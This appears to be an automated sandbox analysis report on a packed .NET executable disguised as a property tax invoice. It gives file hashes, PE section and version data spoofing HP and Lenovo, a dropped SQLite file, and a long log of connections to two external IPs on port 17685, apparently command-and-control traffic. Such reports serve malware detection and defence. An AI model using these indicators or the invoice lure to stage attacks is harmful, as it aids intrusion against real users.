Preview:	MQAWXUYAIKJZDQIPIEWMLSKXQDXCSIBTOUXCXZAQEYMFIPUKEWDRKYXMBFAEAIEBYLJHANJDICKVRWRYTJZOWEFFJPSSDNBTMTPIVXSVKHYSQUVOKIIKOHZRTBEATVKDWNNQBMYUGKPMRHQBAPGBOTHRORULCQYAEBJYXMZFZXEDLVUTMXEOPNUTQDPFDWWNOPYMFDCDNUQUQLYMWMKOJZMRIYBCAFJAEFUVTOUFBQBRUBWQVGDWPIKRITDALHWQSAPYVARQGQLYXLMNTQSLSPAUIWZRRROVEGNTPLNQITTJYFKNXCKERAVXLSGHLBRKTFPMXSSIBZDONXSKHXZFWONPIPTFGNRIYRMYPZXLVXEJJMAHKCIYWPFDAHGCVFRHUEIHZKBVMRMLFSKMOMDMMQZJJAOFNHFAMIBCLCLZHQCIKLOBZLNSVBVCHDOYIHMAWWJNQHZDGKVCOCIRQOYTUFEWAGZWBPNLJFWAKYETACSEZLMIQNOAAWSGVNBZZZMSSEFVSETBVTSMTSAJHDYWLIBJPQUHPXWOPSVWQVVSLPTYOWJGWLXRJOMQMBZSMWLZZDUJIUHYZLUNSOMJMWEUBWYSZMXVDNUGSZBSFDACOIFWETJRIXVPDMSVMTKEKNHJFFXCTPPDKYDXOUOGJAFSXVENTIMFLXNKBWSOIJAZLZTXZGBBMUATMNGOCOLHIAOOTBENXJLNEBPUYZAWEWHZCOBEUXLNOCBFMFNLCFQRYSEURUEVQSEGVPCVNXYOUEBPWYJVBOVZHHSIVQELASLMFLMIGPFTSWZUYAGUCKFCQXXUWMMESTICTHONLUYSPUWOTQKWRRQMUHGZGAAEZOPOKQULFWRPEFDYEONLKPEMDUKCRINZIRUSKDDNYBNBYIIEFYAXNFVFGHEJTHFTUPICAWBETIIANYRONFSQFBHEGJISEQSPFKPRSEZHTQOXRPUKTEUQJYBYNQULHXLSRXNENUVTORORBUHFHDFSRJFI

C:\Users\user\AppData\Local\Temp\tmpFBF8.tmp

Download File

Process:	C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.4372441284867
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	P90GT_Invoice_Related_Property_Tax_P800.exe
File size:	241664
MD5:	6ffb271dac5aea05d5a8feb1344ac144
SHA1:	20f253980f2d959583346e35b3d36e4aa23e5e70
SHA256:	7107046a7edefa979e9d52e5af41029cc7c3cad45e78ab16ecbbfbb2b6349f18
SHA512:	4c7779e06eb5a14bfdb7d12fe48b6c87fa6329459392c964c74ca98227d012b38a03c9b85ba5dacf091e7de7075862dd222a38dc1a2ede73f4b8fae70ad08be5
SSDEEP:	6144:9gpbhUOMGQHyalJNTGF2kfPySQSAItnexya4y9+xBKKq:7pSalJ8PqSQSBtnexya4y9+xBKK
TLSH:	D8345C8932A471DEE463D1319EB40D60AB727CA6973B820B905B359D5EBE952CF103F3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....r.b..................................... ....@.. ....................... ............@................................

File Icon


Icon Hash:	30e4c4c8ccf4f8fc

Static PE Info

General

Entrypoint:	0x44000a
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x628F7200 [Thu May 26 12:26:40 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00440000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2a358	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3a000	0x3d30	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x40000	0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2a000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
T,y"J8	0x2000	0x27350	0x27400	False	1.00034832803	data	7.99896508555	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.text	0x2a000	0xf5c8	0xf600	False	0.329903455285	data	5.04861159573	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x3a000	0x3d30	0x3e00	False	0.239919354839	data	3.69146167936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3e000	0xc	0x200	False	0.044921875	data	0.0776331623432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
	0x40000	0x10	0x200	False	0.044921875	data	0.122275881259	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x3a160	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
RT_ICON	0x3b208	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
RT_GROUP_ICON	0x3d7b0	0x22	data
RT_VERSION	0x3d7d4	0x370	data
RT_MANIFEST	0x3db44	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright Hewlett-Packard Company 2012
Assembly Version	0.0.0.0
InternalName	AeSRJ.exe
FileVersion	1.0.0.0
CompanyName	Hewlett-Packard Company
ProductName	LenovoController.Application
ProductVersion	1.0.0.0
FileDescription	LenovoController.Application
OriginalFilename	AeSRJ.exe

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2022 19:27:38.664460897 CEST	49729	17685	192.168.2.3	18.197.239.5
May 27, 2022 19:27:38.683514118 CEST	17685	49729	18.197.239.5	192.168.2.3
May 27, 2022 19:27:38.683636904 CEST	49729	17685	192.168.2.3	18.197.239.5
May 27, 2022 19:27:39.375066042 CEST	49729	17685	192.168.2.3	18.197.239.5
May 27, 2022 19:27:39.393995047 CEST	17685	49729	18.197.239.5	192.168.2.3
May 27, 2022 19:27:39.402753115 CEST	17685	49729	18.197.239.5	192.168.2.3
May 27, 2022 19:27:39.404187918 CEST	49729	17685	192.168.2.3	18.197.239.5
May 27, 2022 19:27:39.431945086 CEST	17685	49729	18.197.239.5	192.168.2.3
May 27, 2022 19:27:39.613166094 CEST	49729	17685	192.168.2.3	18.197.239.5
May 27, 2022 19:27:48.029419899 CEST	49729	17685	192.168.2.3	18.197.239.5
May 27, 2022 19:27:48.057007074 CEST	17685	49729	18.197.239.5	192.168.2.3
May 27, 2022 19:27:48.057637930 CEST	49729	17685	192.168.2.3	18.197.239.5
May 27, 2022 19:27:48.097670078 CEST	17685	49729	18.197.239.5	192.168.2.3
May 27, 2022 19:27:48.097711086 CEST	17685	49729	18.197.239.5	192.168.2.3
May 27, 2022 19:27:48.097743988 CEST	17685	49729	18.197.239.5	192.168.2.3
May 27, 2022 19:27:48.097770929 CEST	17685	49729	18.197.239.5	192.168.2.3
May 27, 2022 19:27:48.097872019 CEST	49729	17685	192.168.2.3	18.197.239.5
May 27, 2022 19:28:03.232541084 CEST	17685	49729	18.197.239.5	192.168.2.3
May 27, 2022 19:28:03.232705116 CEST	49729	17685	192.168.2.3	18.197.239.5
May 27, 2022 19:28:18.332537889 CEST	17685	49729	18.197.239.5	192.168.2.3
May 27, 2022 19:28:18.332681894 CEST	49729	17685	192.168.2.3	18.197.239.5
May 27, 2022 19:28:19.732506990 CEST	49729	17685	192.168.2.3	18.197.239.5
May 27, 2022 19:28:19.751707077 CEST	17685	49729	18.197.239.5	192.168.2.3
May 27, 2022 19:28:19.752537012 CEST	49729	17685	192.168.2.3	18.197.239.5
May 27, 2022 19:28:19.869343996 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.888680935 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.888835907 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.890335083 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.909087896 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.918385029 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.919323921 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.938195944 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.938220024 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.938235998 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.938251972 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.938268900 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.938339949 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.938399076 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.957237005 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.957262039 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.957278967 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.957293987 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.957309961 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.957392931 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.957396984 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.957437038 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.957446098 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.957472086 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.957501888 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.957530022 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.957592964 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.976247072 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.976322889 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.976337910 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.976356030 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.976372957 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.976381063 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.976423025 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.976465940 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.976521015 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.976547003 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.976667881 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.976684093 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.976701021 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.976716995 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.976732969 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.976748943 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.976829052 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.976846933 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.976860046 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.976918936 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.976933956 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.976959944 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.977030039 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.977068901 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.977135897 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.977341890 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.995157957 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.995276928 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.995377064 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.995455027 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.995510101 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.995579004 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.995660067 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.995701075 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.995742083 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.995742083 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.995765924 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.995784044 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.995795965 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.995800972 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.995851040 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.995867014 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.995923042 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.995930910 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.995939970 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.996009111 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.996030092 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.996072054 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.996100903 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.996129990 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.996181965 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.996197939 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.996282101 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.996287107 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.996303082 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.996303082 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.996340990 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.996342897 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.996376991 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.996432066 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.996447086 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.996484995 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.996505976 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.996530056 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.996548891 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.996609926 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.996619940 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.996635914 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.996680975 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.996697903 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.996700048 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.996714115 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.996738911 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.996767044 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.996781111 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.996822119 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.996826887 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.996853113 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.996872902 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.996886015 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.996943951 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.996951103 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.996992111 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.997014999 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.997047901 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.997076988 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.997118950 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.997148037 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.997163057 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.997176886 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.997210979 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:19.997226000 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:19.997283936 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.014108896 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.014137030 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.014183044 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.014219999 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.014255047 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.014295101 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.014302969 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.014307976 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.014355898 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.014436007 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.014451027 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.014491081 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.014492989 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.014511108 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.014540911 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.014580965 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.014628887 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.014745951 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.014786959 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.014808893 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.014841080 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.014894962 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.014947891 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.014981985 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.015033960 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.015069962 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.015120983 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.015256882 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.015295982 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.015319109 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.015347958 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.015384912 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.015443087 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.015497923 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.015552998 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.015587091 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.015603065 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.015645027 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.015661001 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.015690088 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.015753984 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.015753984 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.015809059 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.015820026 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.015872002 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.015911102 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.015969038 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.015995979 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.016041994 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.016050100 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.016067028 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.016103983 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.016108036 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.016120911 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.016164064 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.016230106 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.016272068 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.016295910 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.016329050 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.016336918 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.016376972 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.016392946 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.016417980 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.016433001 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.016505003 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.016571999 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.016637087 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.016654015 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.016689062 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.016726971 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.016743898 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.016778946 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.016784906 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.016801119 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.016802073 CEST	49741	17685	192.168.2.3	18.192.93.86
